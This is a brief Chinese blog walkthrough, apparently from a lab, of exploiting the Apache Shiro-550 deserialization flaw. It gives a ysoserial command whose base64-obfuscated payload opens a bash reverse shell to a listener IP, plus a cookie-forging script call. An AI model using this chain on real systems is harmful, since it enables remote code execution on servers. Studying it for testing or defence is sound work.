Shiro漏洞整理

Shiro-550

0x00 发现漏洞

image-20240213234019859

发现shiro

image-20240213234318070

登录页面

image-20240213234400375

0x01

尝试利用

  1. 使用ysoserial.jar

    1
    java -cp ysoserial.jar ysoserial.exploit.JRMPListener 10998 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc5LjEzOC85OTg4IDA+JjE=}|{base64,-d}|{bash,-i}"

  2. 然后生成cookie 

    1
    python shiro-exp.py 192.168.79.1:10998

    image-20240213235416007

  3. 监听

    image-20240213235440759

  4. 设置cookie 发包

    image-20240213235519168

    image-20240213235524893

    发现利用成功

#整理
Shiro漏洞整理
https://tsy244.github.io/2024/02/13/整理/Shiro漏洞整理/
Author
August Rosenberg
Posted on
February 13, 2024
Licensed under